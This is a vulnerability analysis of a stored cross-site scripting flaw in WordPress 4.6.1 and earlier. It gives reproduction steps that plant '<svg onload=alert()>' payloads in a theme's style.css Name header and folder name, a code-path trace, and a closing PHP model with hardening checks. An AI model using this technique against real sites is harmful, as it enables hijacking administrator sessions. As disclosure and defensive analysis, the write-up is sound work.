WordPress <= 4.6.1: using theme files to trigger stored XSS, vulnerability analysis - vulnerability warning - the black bar safety net

2016-10-16T00:00:00
ID MYHACK58:62201680196
Type myhack58
Reporter Anonymous
Modified 2016-10-16T00:00:00

Description

Author: p0wd3r (Knownsec 404 Security Lab) Date: 2016-10-08

0x00 vulnerability overview

1. Vulnerability description

WordPress is free and open source blogging software and content management system built on PHP and MySQL. Researchers recently found that in versions <= 4.6.1, uploading a theme whose configuration (the style.css header and the theme folder name) is maliciously crafted triggers a stored XSS in the backend. Through this vulnerability, an attacker who is able to upload theme files may obtain the administrator's Cookie and perform other sensitive operations.

2. Vulnerability

Given that the attacker can get a theme file uploaded, XSS attacks such as obtaining the administrator's Cookie can be carried out. In practice there are two attack scenarios:

  • The attacker induces the administrator to upload a theme file with a malicious configuration, and the administrator does not inspect the file.
  • An attacker who already has administrator privileges uploads the theme file directly; but since they already have administrator privileges, such an attack is pointless.

3. Impact version

<= 4.6.1

0x01 vulnerability reproduction

1. Environment setup

docker pull wordpress:4.6.1
docker pull mysql
docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql
docker run --name wp --link wp-mysql:mysql -d wordpress

2. Vulnerability analysis

We first download a theme:

wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip
unzip -x illdy.1.0.29.zip

Then change illdy/style.css as follows:

/*
Theme Name: <svg onload=alert(1234)>
...
DO NOT CHANGES HERE
...
*/

Then change the folder name and package it:

mv illdy "<svg onload=alert(5678)>"
zip -r theme.zip "<svg onload=alert(5678)>"

After constructing the package, we log in to the backend, upload the theme file, and start dynamic debugging at the same time.

The first stop is wp-admin/includes/class-theme-installer-skin.php lines 55-82:

$name = $theme_info->display('Name');
// ...

if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) {
    $install_actions['preview'] = '<a href="' . wp_customize_url( $stylesheet ) . '" class="hide-if-no-customize load-customize"><span aria-hidden="true">' . __( 'Live Preview' ) . '</span><span class="screen-reader-text">' . sprintf( __( 'Live Preview &#8220;%s&#8221;' ), $name ) . '</span></a>';
}
$install_actions['activate'] = '<a href="' . esc_url( $activate_link ) . '" class="activatelink"><span aria-hidden="true">' . __( 'Activate' ) . '</span><span class="screen-reader-text">' . sprintf( __( 'Activate &#8220;%s&#8221;' ), $name ) . '</span></a>';

The values held in $theme_info at this point are as follows:

[screenshot of the $theme_info object from the debugger; image not preserved]

Here the stylesheet and template values are the folder name we changed, and headers['Name'] is the Name we changed in style.css. So $theme_info carries a payload we control; display() is called on it and the result is assigned to $name, which is concatenated directly into the HTML. The key point is therefore the display function. Dynamic debugging takes us to wp-includes/class-wp-theme.php lines 630-646:

public function display( $header, $markup = true, $translate = true ) {
    $value = $this->get( $header );
    if ( false === $value ) {
        return false;
    }

    if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) )
        $translate = false;

    if ( $translate )
        $value = $this->translate_header( $header, $value );

    if ( $markup )
        $value = $this->markup_header( $header, $value, $translate );

    return $value;
}

From the call site above, $header is 'Name'. First look at $this->get( $header ), in wp-includes/class-wp-theme.php lines 594-617:

public function get( $header ) {
    // ...
    $this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );
    // ...
    return $this->headers_sanitized[ $header ];
}

The parts unrelated to the vulnerability are omitted here. The program proceeds into $this->sanitize_header, in wp-includes/class-wp-theme.php lines 661-705:

private function sanitize_header( $header, $value ) {
    switch ( $header ) {
        // ...
        case 'Name' :
            static $header_tags = array(
                'abbr'    => array( 'title' => true ),
                'acronym' => array( 'title' => true ),
                'code'    => true,
                'em'      => true,
                'strong'  => true,
            );
            $value = wp_kses( $value, $header_tags );
            break;
        // ...
    }

The program goes through the Name branch here; you can see that it filters $value with wp_kses, permitting only the HTML tags listed in $header_tags. Our headers['Name'] value <svg onload=alert(1234)> is therefore not allowed, and $value becomes an empty string.

The program then returns to display(). Dynamic debugging shows that it executes the branch $value = $this->markup_header( $header, $value, $translate ); following that into wp-includes/class-wp-theme.php lines 720-748:

private function markup_header( $header, $value, $translate ) {
    switch ( $header ) {
        case 'Name' :
            if ( empty( $value ) )
                $value = $this->get_stylesheet();
            break;
        // ...
    }
    return $value;
}
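To tie the two functions together, here is a small stand-alone PHP model of this code path. It is an added example, not WordPress's own code: wp_kses() is replaced by strip_tags() with the same tag allowlist, the names ThemeModel, render_activate_label() and is_safe_theme_slug() are my own, and the hardened branch (HTML-escaping the fallback value) is a suggested mitigation rather than a quote of any WordPress patch. Running it shows the sanitized Name collapsing to an empty string, the unescaped folder name taking its place in the installer markup, and how escaping the fallback or rejecting the folder name at upload time stops that.

```php
<?php
// Added example (not WordPress code): a minimal model of the WP_Theme path the
// write-up walks through. wp_kses() is approximated with strip_tags() and the
// allowlist from sanitize_header(); the sample header/folder values below are
// constructed to match the write-up's payloads.

class ThemeModel
{
    private $headers;    // raw headers parsed from style.css (e.g. 'Name')
    private $stylesheet; // theme folder name taken from the uploaded zip

    public function __construct(array $headers, $stylesheet)
    {
        $this->headers    = $headers;
        $this->stylesheet = $stylesheet;
    }

    // Stands in for sanitize_header(): for 'Name' only a few inline tags survive,
    // so a value that consists of nothing but a disallowed tag collapses to ''.
    private function sanitize_header($header, $value)
    {
        if ($header === 'Name') {
            return strip_tags($value, '<abbr><acronym><code><em><strong>');
        }
        return $value;
    }

    // Stands in for markup_header(): an empty Name falls back to the folder name.
    // In the vulnerable path the fallback is returned as-is; $escape_fallback
    // turns on the hardening (HTML-escaping the fallback, esc_html-style).
    private function markup_header($header, $value, $escape_fallback)
    {
        if ($header === 'Name' && $value === '') {
            $value = $this->stylesheet;
            if ($escape_fallback) {
                $value = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
            }
        }
        return $value;
    }

    // Stands in for display(): sanitize, then apply the markup/fallback step.
    public function display($header, $escape_fallback = false)
    {
        $raw   = isset($this->headers[$header]) ? $this->headers[$header] : '';
        $value = $this->sanitize_header($header, $raw);
        return $this->markup_header($header, $value, $escape_fallback);
    }
}

// The installer skin concatenates $name straight into markup; this mirrors the
// screen-reader span of the 'activate' action shown in the write-up.
function render_activate_label(ThemeModel $theme, $escape_fallback = false)
{
    $name = $theme->display('Name', $escape_fallback);
    return '<span class="screen-reader-text">' .
        sprintf('Activate &#8220;%s&#8221;', $name) . '</span>';
}

// Upload-side check (assumption: a theme folder name never legitimately needs
// markup): reject slugs outside a conservative character set before install.
function is_safe_theme_slug($slug)
{
    return (bool) preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $slug);
}

// Constructed sample input matching the write-up's style.css and folder name.
$malicious = new ThemeModel(
    array('Name' => '<svg onload=alert(1234)>'),
    '<svg onload=alert(5678)>'
);
$benign = new ThemeModel(array('Name' => 'Illdy'), 'illdy');

echo "benign:              ", render_activate_label($benign), "\n";
echo "vulnerable fallback: ", render_activate_label($malicious), "\n";
echo "hardened fallback:   ", render_activate_label($malicious, true), "\n";
echo "slug check illdy:    ", is_safe_theme_slug('illdy') ? 'accept' : 'reject', "\n";
echo "slug check payload:  ", is_safe_theme_slug('<svg onload=alert(5678)>') ? 'accept' : 'reject', "\n";
```

Run it with `php model.php`. The benign theme prints its Name unchanged; the malicious one shows the svg tag from style.css stripped by the sanitizer, after which the raw folder name from the zip reappears inside the span, which is exactly the sequence the debugger trace above follows. With escaping enabled the same input renders as inert text, and the slug check rejects the folder name before any of this code runs.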
